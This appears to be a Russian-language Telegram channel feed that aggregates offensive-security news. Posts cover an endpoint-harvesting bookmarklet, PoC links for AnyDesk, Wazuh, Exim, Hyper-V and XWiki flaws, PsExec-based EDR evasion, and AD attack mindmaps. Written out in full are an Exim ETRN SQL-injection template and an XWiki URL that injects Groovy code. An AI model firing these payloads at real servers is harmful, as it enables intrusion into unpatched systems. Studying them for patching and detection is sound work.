Pentester's Backlog
593 subscribers
313 photos
15 videos
44 files
426 links
Агрегатор новостей из мира наступательной безопасности.

EDUCATIONAL PURPOSES ONLY
Download Telegram
Одним из ключевых шагов в разведке при работе с новым приложением является сбор API-эндпоинтов из JavaScript-файлов. 💻

Существует множество методов для автоматизации сбора эндпоинтов, и одним из самых простых и удобных способов является использование закладок 🗓

Ниже представлю один из таких скриптов, который поможет вам эффективно собирать API-эндпоинты.

javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\'|\`))\/[a-zA-Z0–9_?&=\/\-\#\.]*(?=(\"|\'|\`))/g;const results=new Set;for(var i=0;i<scripts.length;i++){var t=scripts[i].src;""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+"<br>")})}setTimeout(writeResults,3e3);})();


1️⃣ Добавьте новую закладку на панель инструментов вашего браузера.
2️⃣ Замените URL-адрес закладки фрагментом кода JavaScript, представленным выше.
3️⃣ Перейдите на целевую страницу и нажмите на закладку. Скрипт запустится в вашем браузере, открывая ранее неизвестные конечные точки прямо на странице.
This media is not supported in your browser
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
Forwarded from RedTeam brazzers (Миша)
Всем привет!

Недавно вышел интересный разбор LPE-уязвимости CVE-2024-12754 через AnyDesk. Разбор подробный, однако без POC. Поэтому надо исправлять :)

Сам механизм повышения привилегий основывается на возможности контроля целевого файла, который копируется в доступную для чтения низкопривилегированного пользователя директорию.

Нам остается лишь заставить AnyDesk, работающий от лица системы, прочитать файл, недоступный нам. Автор в статье использует чтение SAM из Shadow Copy.

Разработку, тестирование и отладку я проводил на AnyDesk версии 8.0.10, которую качал отсюда.

Вы можете сами попробовать POCнуть эту уязвимость, используя набор инструментов от Google Project Zero.

Моя реализация доступна здесь. Она осуществляет чтение произвольного файла, после чего копирует его содержимое на рабочий стол текущему пользователю.

Хоть Windows и активно продвигает механизм защиты, именуемый RedirectionTrust, предотвращающий переход по ссылкам, созданными не администраторами, однако эта митигация зачастую не распространяется на службы, которые были разработаны сторонними компаниями. Причина проста: разработчики не знают о ней и забывают применить, отсюда и появляется возможность LPE.

Демо можно посмотреть здесь
Forwarded from 1N73LL1G3NC3
🍊 Psexecsvc

A python implementation of PSExec's native service implementation.

You will often see EDR’s block wmiexec.py and psexec.py but they won’t always block PsExecSVC.py because it relies on a legitimate and trusted tool (the PsExeSVC.exe binary)!

Blog: PsExec’ing the right way and why zero trust is mandatory

In this blog post, we’ll have a glimpse at how PsExec.exe works, we’ll write a python script that allows us to act as a legitimate PsExec.exe client and finally, we’ll see why zero trust is a core requirement of cybersecurity.
🔥2
Forwarded from RedTeam brazzers (Миша)
Всем привет!

Количество статей про Kerberos Relay увеличивается непропорционально слабо, в отличие от количества вопросов по этой теме. Поэтому я принял решение сделать небольшую карту, с помощью которой можно подобрать инструмент, подходящий именно вам, исходя из конкретной ситуации.

Карту в полном формате и с кликабельными ссылками можно найти тут:
https://github.com/CICADA8-Research/Penetration/tree/main/KrbRelay%20MindMap

Всем удачного понедельника 🙂
Forwarded from APT
⚙️ Wazuh — Unsafe Deserialization RCE (CVE-2025-24016)

An unsafe deserialization vulnerability in Wazuh servers allows remote code execution through unsanitized dictionary injection in DAPI requests/responses. If an attacker injects an unsanitized dictionary into a DAPI request or response, they can craft an unhandled exception, allowing arbitrary Python code execution.

🔗 Source:
https://github.com/0xjessie21/CVE-2025-24016

#wazuh #deserialization #rce #cve
Forwarded from SecuriXy.kz
Обнаружена SQLi уязвимость CVE-2025-26794 в #Exim версии 4.98 при использовании сериализации ETRN.


ETRN #',1); ## INSERT SQL HERE ## /*


Для устранения проблемы рекомендуется обновиться до версии 4.98.1.

Подробности и эксплойт в контейнере доступны по ссылке https://github.com/OscarBataille/CVE-2025-26794
Forwarded from s0ld13r ch. (s0ld13r)
Появился POC на свежую уязвимость CVE-2025-21333 💀

Windows Hyper-V NT Kernel Integration VSP Elevation of Privilege - локальный юзер может повысить привилегии до SYSTEM на хосте с активным Hyper-V 🔥

🔗 Repo: https://github.com/MrAle98/CVE-2025-21333-POC

P.S PoC не проверял

@s0ld13r_ch
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
Forwarded from SecuriXy.kz
В OpenSource платформе XWiki (https://www.xwiki.org/xwiki/bin/view/Main/WebHome) нашли #RCE CVE-2025-24893

PoC:

<host>/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28"Hello%20from"%20%2B%20"%20search%20text%3A"%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20


https://github.com/advisories/GHSA-rr6p-3pfg-562j
Forwarded from SecuriXy.kz
Еще один SOC инструмент сдырявился следом за вазухом

🚨 Критическая уязвимость в #Kibana : ESA-2025-06 - В версиях от 8.15.0 до 8.17.2 обнаружена уязвимость, позволяющая выполнить произвольный код через Prototype Pollution. Эта уязвимость (CVE-2025-25012) имеет высокий уровень опасности с оценкой CVSS 9.9.

Кто подвержен риску?
В версиях 8.15.0–8.17.0: пользователи с ролью Viewer.
В версиях 8.17.1 и 8.17.2: пользователи с ролями, включающими привилегии fleet-all, integrations-all и actions:execute-advanced-connectors.

Рекомендуемые действия:
Обновитесь до версии Kibana 8.17.3.
Если обновление невозможно, добавьте в конфигурацию Kibana параметр:

xpack.integration_assistant.enabled: false
🤯1
Forwarded from Offensive Xwitter
😈 [ Mayfly @M4yFly ]

New Active Directory Mindmap v2025.03! 🚀

📖 Readable version:

🔗 https://orange-cyberdefense.github.io/ocd-mindmaps/img/mindmap_ad_dark_classic_2025.03.excalidraw.svg

🔧 Now fully generated from markdown files—way easier to update and maintain!

💡 Got improvements? PRs welcome! 👇

🔗 https://github.com/Orange-Cyberdefense/ocd-mindmaps/tree/main/excalimap/mindmap/ad

🐥 [ tweet ]
🔥1
Forwarded from Ralf Hacker Channel (Ralf Hacker)
При эксплуатации уязвимостей ADCS могут возникать разные ошибки. В блоге подробно рассмотрены причины популярных ошибок, а также варианты решения этих проблем

https://sensepost.com/blog/2025/diving-into-ad-cs-exploring-some-common-error-messages/

#pentest #redteam #adcs
2
😳😳😳
🔥10👍21
В общем и целом это было не сказать бы что сложно.

Весь цикл от начала обучения до сдачи экзамен занял 3 месяца - при этом, времени на активное обучение было потрачено от силы 20-30 дней (праздники, проекты на работе, все дела).

Не хочу сильно вдаваться в подробности экзамена в этом посте, но я ещё не видел на просторах infosec-комьюнити пост/статьи о сдаче именно OSCP+ сертификата (а я, напомню, что под этот формат произошли небольшие изменения в процессе сдачи).

Исходя из этого, у меня к вам вопрос: хотите ли вы увидеть небольшую выписку (статей на хабре и так уже много) о моих впечатлениях от обучения/экзаменационного процесса и о формате сдачи экзамена в 2025 году?
Писать статейку?
Anonymous Poll
81%
Да
6%
Нет
13%
Хочу увидеть результаты
Forwarded from AP Security
#soc

Свежие индикаторы компрометации: NTLM Relay Attack

Текущая реализация атаки Shadow credentials во фреймворке Impacket, используемая, в частности, скриптом ntlmrelayx.py, содержит множество ошибок, оставляющих уникальные подписи на структурах данных NGC, записываемых злоумышленниками в LDAP-атрибут msDS-KeyCredentialLink. С помощью эвристики можно выявить большинство вредоносных ключей NGC, независимо от того, с помощью какого хакерского инструмента они были сгенерированы.
👍1